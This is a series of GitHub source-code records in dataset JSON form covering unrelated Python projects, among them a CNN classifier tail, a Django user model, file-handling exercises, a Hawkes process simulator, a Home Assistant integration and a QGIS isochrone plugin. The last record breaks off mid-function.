classifier.predict(test_image)\ntraining_set.class_indices\nif result[0][0] == 1:\n prediction = 'dog'\nelse:\n prediction = 'cat'\n\nprint(prediction)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"DaniVSainz/DeepLearning_A-Z","sub_path":"Volume 1 - Supervised Deep Learning/Part 2 - Convolutional Neural Networks (CNN)/Section 8 - Building a CNN/Convolutional_Neural_Networks/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35614729891","text":"from math import factorial\nfrom typing import List, Callable, Tuple\nfrom sqlparse.sql import Identifier\nimport itertools\nfrom .JoinNode import JoinNode, JoinData\nfrom codegen.table import FreeConnexTable, Table\n\n\nclass FreeConnexJoinNode(JoinNode):\n \"\"\"\n A join node which will try to create a free connex join. However, it won't guarantee the generated\n join tree will be a free connex join tree.\n \"\"\"\n\n def __init__(self, join_list: List[JoinData], tables: List[Table],\n is_free_connex_table: Callable[[], Tuple[bool, List[Table]]]):\n \"\"\"\n Initialize a Free Connex Join Node.\n\n :param join_list: a list of join data. Included left key, right key.\n :param tables: A list of tables\n :param is_free_connex_table: A function which can be used to test if one join tree is a free connex join tree\n \"\"\"\n\n super().__init__(join_list, tables)\n self.is_free_connex_table = is_free_connex_table\n\n def merge(self):\n \"\"\"\n Enumerate all possible join trees in order to find the free connex join tree\n :return:\n \"\"\"\n self.preprocess_join_list()\n length = len(self.join_list)\n\n # Will generate a list of combinations with 0 and 1\n # 0 means will perform left to right join\n # 1 means will perform right to left join\n # this will let the program enumerate all the possible join trees\n # in order to find the free connex join tree\n combinations = list(itertools.product([0, 1], repeat=length))\n\n for i, combination in enumerate(combinations):\n # (0, 0, 0)\n combination: Tuple[int]\n\n self.__perform_join__(combination)\n is_free_connex, _ = self.is_free_connex_table()\n if not is_free_connex:\n if i == len(combinations) - 1:\n pass\n\n else:\n self.__clear_join__()\n else:\n break\n\n def __perform_join__(self, combination: Tuple[int]):\n \"\"\"\n Join two tables. If the current index of table less than the index, the perform left join right,\n otherwise, right to left\n :param index: current index\n :return:\n \"\"\"\n for i, c in enumerate(self.join_list):\n c: JoinData\n left_table = None\n right_table = None\n for table in self.tables:\n column_names = [t.name for t in table.original_column_names]\n\n if str(c.right) in column_names and not right_table:\n right_table = table\n continue\n\n if str(c.left) in column_names and not left_table:\n left_table = table\n\n if left_table and right_table:\n if combination[i] == 1:\n right_table.join(left_table, str(c.right), str(c.left))\n else:\n left_table.join(right_table, str(c.left), str(c.right))\n left_table.used_in_join = True\n right_table.used_in_join = True\n # left_table.join(right_table, str(c.left), str(c.right))\n if left_table not in self.join_tables:\n self.join_tables.append(left_table)\n\n if right_table not in self.join_tables:\n self.join_tables.append(right_table)\n\n else:\n if not left_table and type(c.left) is Identifier:\n raise RuntimeError(f\"Cannot find related join column: {c.left}\")\n elif not right_table and type(c.right) is Identifier:\n raise RuntimeError(f\"Cannot find related join column: {c.right}\")\n\n def __clear_join__(self):\n \"\"\"\n Clear all join\n :return:\n \"\"\"\n for table in self.join_tables:\n table.clear_join()\n\n self.join_tables = []\n","repo_name":"secyan/secyan_gen","sub_path":"codegen/node/cpp_nodes/FreeConnexJoinNode.py","file_name":"FreeConnexJoinNode.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"40893572550","text":"from django.contrib.auth.models import AbstractUser\r\nfrom django.contrib.auth.validators import UnicodeUsernameValidator\r\nfrom django.db import models\r\n\r\n\r\nclass Users(AbstractUser):\r\n username = models.CharField(\r\n 'Имя пользователя',\r\n max_length=30,\r\n validators=[UnicodeUsernameValidator],\r\n unique=True,\r\n )\r\n\r\n class Meta:\r\n ordering = ('id',)\r\n verbose_name = 'Пользователь'\r\n verbose_name_plural = 'Пользователи'\r\n\r\n def __str__(self):\r\n return self.username\r\n","repo_name":"borrrv/news","sub_path":"backend/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36364707342","text":"def open_print(file_name):\n try:\n opened_file = open(file_name, 'r')\n lines = opened_file.readlines()\n for line in lines:\n print(line.strip('\\n'))\n\n opened_file.close() # closes the file, so can be saved without conflict\n\n except FileNotFoundError as error_message: # original error message\n print('Check file name/path - File can not be found')\n print(error_message)\n # raise\n\ndef open_print_close(file_name):\n try:\n with open(file_name, 'r') as file:\n lines = file.readlines()\n for line in lines:\n print(line.strip('\\n'))\n except FileNotFoundError as error:\n print('Check your file')\n print(error)\n finally:\n print('Program ending')\n\ndef open_write_txt(file, item):\n try:\n with open(file, 'a') as file_to_write:\n file_to_write.write(item + '\\n')\n except FileNotFoundError as error:\n print('Check your file/path')\n print(error)\n finally:\n print('Program ending')\n\nopen_write_txt('order2.txt', 'cupcake')\nopen_write_txt('order2.txt', 'OJ with carrot')\nopen_write_txt('order2.txt', 'Beans on toast')\nopen_write_txt('order2.txt', 'Eggs Benedict')\nopen_print_close('order2.txt')\n","repo_name":"dilanmorar/opening_writing_error_handling_files","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70267300989","text":"\nimport epyk as pk\n\n\npage = pk.Page()\npage.headers.dev()\n\n# Console component\nc = page.ui.rich.console(\n \"* This is a log section for all the events in the different buttons *\", options={\"timestamp\": True})\n\n# Create two default rimepicker with different dates\nfirst = page.ui.fields.now(label=\"timestamp\", color=\"red\", helper=\"This is the report timestamp\")\ncurrent = page.ui.fields.now(label=\"Time field\", deltatime=-60)\n\n# Create a bespoke one with a fixed time\nmorning = page.ui.fields.time(\"8:13:00\", label=\"Time field\")\nmorning.options.interval = 60\n\n# Add event when the timepciker object change\nmorning.change([\n c.dom.write(\"'time'\", skip_data_convert=True)\n])\n\n# Add button to retrieve the value of the different timepcickers\npage.ui.button(\"Click\").click([\n c.dom.write(current.input.dom.content),\n c.dom.write(first.input.dom.val, stringify=True),\n first.input.js.value(\"9:00:00\"),\n current.input.build(\"9:00:00\"),\n])\n\nc.move()\n\n","repo_name":"epykure/epyk-templates","sub_path":"locals/packages/timepicker.py","file_name":"timepicker.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"30764062823","text":"# Serializing an object and retrieving its data\nimport pickle\n\n\nclass Vehicles():\n def __init__(self, brand, model):\n\n self.brand = brand\n self.model = model\n self.running = False\n self.speedUp = False\n self.brake = False\n\n def startEng(self):\n\n self.running = True\n\n def spdUp(self):\n\n self.speedUp = True\n\n def stop(self):\n\n self.brake = True\n\n def vehStatus(self):\n\n print('Brand: ', self.brand, '\\nModel: ', self.model, '\\nRunning: ',\n self.running, '\\nSpeeding Up: ', self.speedUp, '\\nBraking: ', self.brake)\n\n\nmyCar1 = Vehicles('Ferrari', 'Spider')\nmyCar2 = Vehicles('Porsche', '911')\nmyCar3 = Vehicles('Audi', 'Q3')\n\nmyCars = [myCar1, myCar2, myCar3]\n\nobjBinaryFile = open('MyCars', 'wb') # Creating the binary file\n\npickle.dump(myCars, objBinaryFile) # Dumping the object into the binary file\n\nobjBinaryFile.close()\n\ndel (objBinaryFile)\n\n# Retriving the object from the binary file\n\nretBinary = open('MyCars', 'rb') # Opening the file on reading binary mode\n\n# Saving the objects on the retCarList variable\nretCarList = pickle.load(retBinary)\n\nretBinary.close() # Closing the file\n\nfor c in retCarList:\n print(c.vehStatus()) # Printing objects from the list, one by one\n","repo_name":"Giorc93/PythonCourse","sub_path":"Serialization/serialization2.py","file_name":"serialization2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"36272456475","text":"# harrison frahn\n# period 2\n# chapter 7.5\n# expected input: the number of how many bags were filled (an integer)\ndef main():\n\ttry:\n\t\tbags = eval(input(\"Enter the number of bags of litter filled: \"))\n\t\tif bags%1==0 and bags > 0:\n\t\t\tfine = 75+bags*10\n\t\t\tif bags > 10:\n\t\t\t\tfine += 500\n\t\t\tprint(\"Your fine is \"+str(fine)+'.')\n\t\telif bags <= 0:\n\t\t\tprint(\"You can't fill negative bags!\")\n\t\telif bags%1!=0:\n\t\t\tprint(\"You can't fill a fraction of a bag!\")\n\texcept NameError:\n\t\tprint(\"You entered letters, not a number!\")\n\texcept SyntaxError:\n\t\tprint(\"Either you didn't enter any number, or you entered the number wrong!\") \n\texcept TypeError:\n\t\tprint(\"You entered more than 1 number!\")\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\n\")\n\texcept:\n\t\tprint(\"Something went wrong!!\")\nif __name__ == '__main__':\n\tmain()\n","repo_name":"hrfrahn/functprog","sub_path":"chaper 7 programming projects/ch7_5.py","file_name":"ch7_5.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"730575856","text":"import os\nimport logging\n\nfrom gevent import monkey\nmonkey.patch_all()\n\nfrom app import create_app, db, socketio\nfrom app.models import User, Role, Room, RoomComponent, Object, Widget, StatisticEvent\nfrom app.models import create_sample_db, add_event\n\nfrom flask.ext.script import Manager, Shell\nfrom flask.ext.migrate import Migrate, MigrateCommand\n\n# initialize logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n# check installation (errors in Flask-uploads)\nfrom os import name\nfrom os.path import isdir, islink\n\nif name == 'posix':\n if not isdir('app/uploads') or not islink('uploads'):\n logger.error(\"Please verify that app/uploads directory exits and that uploads is a symbolic link to it.\")\n exit()\nelif name == 'nt':\n if not isdir('app/uploads') or not isdir('uploads'):\n logger.error(\"Please verify that app/uploads directory exits and that uploads is a symbolic link to it.\")\n exit()\n\n logger.error(\"Please make sure that uploads is a symbolic link to the app/uploads directory.\")\n\n# create application\napp = create_app(os.getenv('FLASK_CONFIG') or 'default')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\n\ndef make_shell_context():\n return dict(app=app, db=db, User=User, Role=Role, Room=Room, RoomComponent=RoomComponent, Widget=Widget, Object=Object)\n\nmanager.add_command('shell', Shell(make_context=make_shell_context))\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)\n\n\n@manager.command\ndef sample_db():\n create_sample_db()\n\n\n@manager.command\ndef server():\n socketio.run(app, host='0.0.0.0', port=16000, policy_server=False)\n\nif __name__ == '__main__':\n manager.run()\n","repo_name":"compeit-open-source/dashboard","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"27742022676","text":"# grouping with dictionaries\nnames = ['raymond', 'rachel', 'matthew', 'roger',\n 'betty', 'melissa', 'judith', 'charlie']\n\nd = {}\nfor name in names:\n\tkey = len(name)\n\tif key not in d:\n\t\td[key] = []\n\td[key].append(name)\n# start with an empty dictionary\n# the key is the value one wishes to group by\n\n# e.g. raymond is of length 7, along with all the names\n# to group by anything else, just change the key line\n# e.g. by the first letter, thumber if e in the name\n# a better way\nd = {}\nfor name in names:\n\tkey = len(name)\n\td.setdefault(key, []).append(name)\n# we need to return the list so we can append to it\n# but also need to be inserted in\n# setdefault is just like get but has the side effect of\n# inserting the missing key\n# e.g. this goes into the dictionary see if the key is there\n# if it's not, takes the default value and inserts it\n# and returns it so you can group with it\n\n# a better way\nd = defaultdict(list)\nfor name in names:\n\tkey = len(name)\n\td[key].append(name)\n# wherever you see #326\n# do this instead\n# looks better, is faster\n","repo_name":"nicolageorge/idiomaticpython","sub_path":"presentation/2 2 grouping dict.py","file_name":"2 2 grouping dict.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74553216826","text":"class Employee:\n def __init__(self, name, employee_id, job_title, salary):\n self.name = name\n self.employee_id = employee_id\n self.job_title = job_title\n self.salary = salary\n\n def __str__(self):\n return f\"{self.name} (ID: {self.employee_id}, Job Title: {self.job_title}, Salary: {self.salary})\"\n\n\nclass EmployeeManager:\n def __init__(self):\n self.employees = []\n\n def add_employee(self, employee):\n self.employees.append(employee)\n\n def remove_employee(self, employee_id):\n employee = self.find_employee_by_id(employee_id)\n if employee is not None:\n self.employees.remove(employee)\n\n def find_employee_by_id(self, employee_id):\n for employee in self.employees:\n if employee.employee_id == employee_id:\n return employee\n return None\n\n def view_employees(self):\n for employee in self.employees:\n print(employee)\n\n\ndef main():\n employee_manager = EmployeeManager()\n\n while True:\n print(\"\\nEmployee Record Manager\")\n print(\"1. Add Employee\")\n print(\"2. Remove Employee\")\n print(\"3. View Employees\")\n print(\"4. Exit\")\n\n choice = int(input(\"Enter your choice: \"))\n\n if choice == 1:\n name = input(\"Enter employee name: \")\n employee_id = input(\"Enter employee ID: \")\n job_title = input(\"Enter job title: \")\n salary = float(input(\"Enter salary: \"))\n employee = Employee(name, employee_id, job_title, salary)\n employee_manager.add_employee(employee)\n elif choice == 2:\n employee_id = input(\"Enter employee ID: \")\n employee_manager.remove_employee(employee_id)\n elif choice == 3:\n employee_manager.view_employees()\n elif choice == 4:\n break\n else:\n print(\"Invalid choice. Please try again.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bhamdou/exercise_30mar","sub_path":"Employee-Record_Manager.py","file_name":"Employee-Record_Manager.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14975430510","text":"\"\"\"DataUpdateCoordinator for dueros.\"\"\"\nfrom __future__ import annotations\n\nfrom datetime import timedelta\nfrom dueros_smarthome.models import Appliance\nfrom dueros_smarthome.client import SmartHomeClient\nfrom dueros_smarthome.const import STATUS_OK, STATUS_NOT_LOGIN\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.update_coordinator import (\n DataUpdateCoordinator,\n UpdateFailed,\n)\nfrom homeassistant.exceptions import ConfigEntryAuthFailed\n\n\nfrom .const import DOMAIN, LOGGER, BOT_ID_APPLIANCE_ID_SEPARATOR\n\n\ndef get_unique_id(appliance: Appliance) -> str:\n \"\"\"Get appliance's unique ID.\"\"\"\n return f\"{appliance.bot_id}{BOT_ID_APPLIANCE_ID_SEPARATOR}{appliance.appliance_id}\"\n\n\n# https://developers.home-assistant.io/docs/integration_fetching_data#coordinated-single-api-poll-for-data-for-all-entities\nclass DuerOSDataUpdateCoordinator(DataUpdateCoordinator):\n \"\"\"Class to manage fetching data from the API.\"\"\"\n\n config_entry: ConfigEntry\n\n def __init__(\n self,\n hass: HomeAssistant,\n client: SmartHomeClient,\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.client = client\n super().__init__(\n hass=hass,\n logger=LOGGER,\n name=DOMAIN,\n update_interval=timedelta(seconds=30),\n )\n\n async def _async_update_data(self):\n \"\"\"Update data via library.\"\"\"\n rsp = await self.client.get_device_list()\n if STATUS_NOT_LOGIN == rsp.status:\n LOGGER.error(rsp.msg)\n raise ConfigEntryAuthFailed(rsp.msg)\n if STATUS_OK != rsp.status:\n LOGGER.error(rsp.msg)\n raise UpdateFailed(rsp.msg)\n return {get_unique_id(appliance): appliance for appliance in rsp.appliances}\n","repo_name":"zsy056/dueros-ha","sub_path":"custom_components/dueros/coordinator.py","file_name":"coordinator.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42897251222","text":"import numpy as np\nimport numba as nb\n\nspec = [\n ('lambda_0', nb.float64), ('t_0', nb.float64), ('alpha', nb.float64), ('beta', nb.float64), ('seed', nb.int64),\n ('maxsize', nb.int64),\n\n ('lamb', nb.float64), ('t', nb.float64), ('s', nb.float64), ('u', nb.float64),\n ('lambda_last_jump', nb.float64), ('last_jump', nb.float64), ('last_accepted', nb.boolean),\n ('is_initial', nb.boolean), ('nb_jumps', nb.int64),\n ('jumps', nb.float64[:]), ('finished', nb.boolean)\n]\n\n\n@nb.jitclass(spec)\nclass NumbaHawkesProcess(object):\n \"\"\"\n This classes aims at replicating the algorithm exposed in the pure python\n HawkesProcess class above in a numba fashion.\n It will only implement the simulation in itself as all external modules but numpy\n can't be used.\n The signature of the class has to be specified (spec above) and all\n arrays have to be instantiated with a specific length (maxsize).\n\n \"\"\"\n\n def __init__(self, lambda_0, t_0, alpha, beta, seed, maxsize):\n np.random.seed(seed)\n self.lambda_0 = lambda_0\n self.t_0 = t_0\n self.alpha = alpha\n self.beta = beta\n self.seed = seed\n self.maxsize = maxsize\n\n self.lamb = self.lambda_0\n self.t = t_0\n self.s = t_0\n self.u = t_0\n self.lambda_last_jump = self.lamb\n self.last_jump = t_0\n self.last_accepted = True\n self.is_initial = True\n self.nb_jumps = 0\n\n self.jumps = np.empty(maxsize, dtype=np.float64)\n self.finished = False\n\n @staticmethod\n def uniform():\n return np.random.uniform(0., 1.)\n\n @staticmethod\n def exp(lamb):\n return np.random.exponential(1 / lamb)\n\n def _first_jump(self, T):\n\n self.s = self.exp(self.lamb)\n self.finished = self.s > T\n self.is_initial = False\n if not self.finished:\n self.t = self.s\n self.last_jump = self.t\n self.jumps[self.nb_jumps] = self.s\n self.nb_jumps += 1\n\n def _accepted_routine(self):\n self.t = self.s\n self.jumps[self.nb_jumps] = self.t\n self.nb_jumps += 1\n self.last_jump = self.t\n\n def _continue_routine(self):\n if self.last_accepted:\n self._accepted_routine()\n\n def lambda_fun(self):\n lambda_part = self.lamb - self.lambda_0\n lambda_part *= np.exp(-self.beta * (self.s - self.u))\n res = self.lambda_0 + lambda_part\n return res\n\n def _routine(self, T):\n if self.last_accepted:\n self.lamb += self.alpha\n self.u = self.s\n self.s += self.exp(self.lamb)\n\n if self.s > T:\n self.finished = True\n\n if not self.finished:\n temp_lamb = self.lambda_fun()\n self.last_accepted = self.uniform() <= temp_lamb / self.lamb\n self.lamb = temp_lamb\n self._continue_routine()\n\n def _clear(self):\n self = self.__init__(self.lambda_0,\n self.t_0,\n self.alpha,\n self.beta,\n self.seed,\n self.maxsize)\n\n def simulate(self, T):\n self._first_jump(T)\n while not self.finished:\n self._routine(T)\n\n result = self.jumps.copy()\n return result\n\n","repo_name":"AdrienCorenflos/HawkesProcesses","sub_path":"numba_univariate.py","file_name":"numba_univariate.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"38471135684","text":"from pathlib import Path\nfrom qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication, QVariant\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtWidgets import QAction\nfrom . import rss_ign\n\n\nfrom qgis.core import QgsProject, QgsVectorLayer, QgsFeature, QgsGeometry, QgsCoordinateReferenceSystem, QgsCoordinateTransform, QgsField, QgsPoint, QgsWkbTypes, QgsPointXY\n\n\n# Import the code for the dialog\nfrom .iso_ign_dialog import IsoIGNDialog\nimport os.path\nimport json, traceback\n\nfrom PyQt5.Qt import QMessageBox\n\n# from pickle import TRUE\n\ntry:\n import requests\nexcept ModuleNotFoundError:\n print(\"installing requests\")\n if platform.system() == \"Windows\":\n subprocess.call([sys.exec_prefix + \"/python\", \"-m\", \"pip\", \"install\", \"requests\"])\n else:\n subprocess.call([\"python3\", \"-m\", \"pip\", \"install\", \"requests\"])\n import requests\n\n try:\n import requests\n\n print(\"installation completed\")\n except ModuleNotFoundError:\n QMessageBox.information(None, \"ERROR\", \"Oops ! L'installation du module requests à échouée. Désolé de ne pas pouvoir aller plus loin...\")\n\nheaders = {\"User-Agent\": \"*\"}\nheaders_v1 = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\",\n \"Referer\": \"https://fiddle.jshell.net/\",\n \"Origin\": \"https://fiddle.jshell.net\"}\n\nURL = \"https://itineraire.ign.fr/simple/1.0.0/\"\nIGN_KEY = 'jhyvi0fgmnuxvfv0zjzorvdn'\n\nversion = \"3.5\"\n\n\nclass IsoIGN:\n \"\"\"Un Plugin QGIS pour calculer des aires de chalandises et recjercher des itinéraires à l'aide\n du Géoportail de l'IGN.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface and Project Instance\n self.iface = iface\n self.project = QgsProject.instance()\n\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value(\"locale/userLocale\")[0:2]\n locale_path = os.path.join(self.plugin_dir, \"i18n\", \"IsoIGN_{}.qm\".format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u\"&IsoIGN\")\n\n # Check if plugin was started the first time in current QGIS session\n # Must be set in initGui() to survive plugin reloads\n self.first_start = None\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate(\"IsoIGN\", message)\n\n def add_action(self, icon_path, text, callback, enabled_flag=True, add_to_menu=True, add_to_toolbar=True, status_tip=None, whats_this=None, parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n # Adds plugin icon to Plugins toolbar\n self.iface.addToolBarIcon(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(self.menu, action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = Path(__file__).parent / \"icon.png\"\n self.add_action(str(icon_path), text=self.tr(u\"IsoIGN\"), callback=self.run, parent=self.iface.mainWindow())\n\n # will be set False in run()\n self.first_start = True\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginMenu(self.tr(u\"&IsoIGN\"), action)\n self.iface.removeToolBarIcon(action)\n\n ########################################################################\n # Fonctions utiles #\n ########################################################################\n\n def get_bornes(self):\n self.u_bornes = self.iso_ign_windows.lineEdit_user_rq.text()\n\n self.u_bornes = self.u_bornes.replace(\" \", \"\")\n if len(self.u_bornes) > 0:\n self.bornes = self.u_bornes.split(\",\")\n\n try:\n self.bornes = [int(i) if self.unit != \"minutes\" else int(i) * 60 for i in self.bornes]\n except ValueError:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Les bornes doivent s'exprimer en chiffres\")\n self.bornes = []\n return self.bornes\n\n return self.bornes\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Liste de bornes vide !\")\n\n def get_param(self):\n\n if self.iso_ign_windows.radioButton_voiture.isChecked():\n self.reseau = \"profile=car\"\n elif self.iso_ign_windows.radioButton_pieton.isChecked():\n self.reseau = \"profile=pedestrian\"\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Veuillez choisir un type de réseau\")\n\n if self.iso_ign_windows.radioButton_distance.isChecked():\n self.methode = \"costType=distance&distanceUnit=meter\"\n self.unit = \"meter\"\n elif self.iso_ign_windows.radioButton_temps.isChecked():\n self.methode = \"costType=time&timeUnit=minute\"\n self.unit = \"minute\"\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Veuillez choisir une méthode de calcul\")\n\n def ask_ign_v1(self, url):\n \"\"\"fonction qui interroge le géoportail et qui retourne la réponse\"\"\"\n # print(url)\n # TODO : tester la connexion\n self.resp = requests.get(url, headers=headers_v1)\n print(headers_v1)\n print(self.resp)\n self.iso_output = self.resp.json()\n\n if self.iso_output:\n\n return self.iso_output\n\n else:\n return \"bug\"\n\n def ask_ign(self, url):\n \"\"\"fonction qui interroge le géoportail et qui retourne la réponse\"\"\"\n # print(url)\n # TODO : tester la connexion\n self.resp = requests.get(url, headers=headers)\n self.iso_output = self.resp.json()\n\n if self.iso_output:\n\n return self.iso_output\n\n else:\n return \"bug\"\n\n ########################################################################\n # Mode Chalandises #\n ########################################################################\n\n def get_iso_v1(self):\n # Initialisation du compteur de réussite\n nb_ok = 0\n\n # Initialisation de la liste d'erreures\n lst_bug = []\n\n # Initialisation des paramètres de recherche\n \"\"\"\n Paramètres de l'API v1:\n https://wxs.ign.fr/jhyvi0fgmnuxvfv0zjzorvdn/isochrone/isochrone.json?\n graphName=Voiture&\n method=distance&\n location=-1.583250,43.453710&\n reverse=false&\n exclusions=&\n srs=EPSG:4326&\n smoothing=true&\n holes=true&\n distance=100\n \"\"\"\n urla = 'https://wxs.ign.fr/'\n urlb = '/isochrone/isochrone.json?location='\n urlc = '&smoothing=true&holes=false&reverse=true&'\n urle = '&srs=EPSG:4326'\n if self.reseau == \"profile=car\":\n graph = \"Voiture\"\n else:\n graph = \"Pieton\"\n \n if self.methode == \"costType=distance&distanceUnit=meter\":\n methode = 'method=distance&distance='\n else:\n methode = 'method=time&time='\n\n # test de présence de bornes\n try:\n rq_bornes = self.get_bornes()\n except Exception:\n self.iso_ign_windows.consol.setText(traceback.format_exc())\n if not rq_bornes:\n return\n\n # test si au moins un point origine est selectioné et reprojection en WGS84\n ori_layer = self.iface.activeLayer()\n selected_pt = ori_layer.selectedFeatures()\n\n if selected_pt:\n crsOri = ori_layer.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n for pt in selected_pt:\n ptt = pt.geometry()\n if ptt.type() == QgsWkbTypes.PointGeometry:\n ptt.transform(xform)\n pt.setGeometry(ptt)\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Vous ne pouvez selectionner que des géométrie de type 'Point'\")\n return\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucun point selectioné!\")\n return\n\n # création du layer de résultats\n res_ly = QgsVectorLayer(\"Polygon\", \"Aire de chalandise\", \"memory\")\n res_provider = res_ly.dataProvider()\n res_provider.addAttributes(ori_layer.fields())\n res_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n res_provider.addAttributes([QgsField(\"iso_unit\", QVariant.String)])\n res_ly.updateFields()\n\n # création du layer d'erreures\n err_ly = QgsVectorLayer(\"Point\", \"Erreures Aire de chalandise\", \"memory\")\n err_provider = err_ly.dataProvider()\n err_provider.addAttributes(ori_layer.fields())\n err_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n err_provider.addAttributes([QgsField(\"error\", QVariant.String)])\n err_ly.updateFields()\n\n # Création de la liste de requêtes à effectuer\n lst_req = []\n for borne in rq_bornes:\n costValue = str(borne)\n for f in selected_pt:\n geom = f.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord = \"%f,%f\" % (gx, gy)\n feat_attribute = f.attributes()\n lst_req.append((coord, costValue, feat_attribute))\n \n # Effectue les recherche\n for r in lst_req:\n urlq = urla + IGN_KEY + urlb + r[0] + urlc + methode + r[1] + '&graphName=' + graph + urle\n print(urlq)\n res = self.ask_ign_v1(urlq)\n\n print(res)\n if res == \"bug\":\n lst_bug.append((r[0], r[1], \"pas de réponse de l'API\", r[2]))\n elif \"error\" in res:\n lst_bug.append((r[0], r[1], res[\"error\"][\"message\"], r[2]))\n else:\n res_feat = QgsFeature()\n res_feat_geom = QgsGeometry.fromWkt(res[\"wktGeometry\"])\n res_feat.setGeometry(res_feat_geom)\n data = r[2]\n data.append(r[1])\n data.append(self.unit)\n res_feat.setAttributes(data)\n res_provider.addFeature(res_feat)\n nb_ok += 1\n 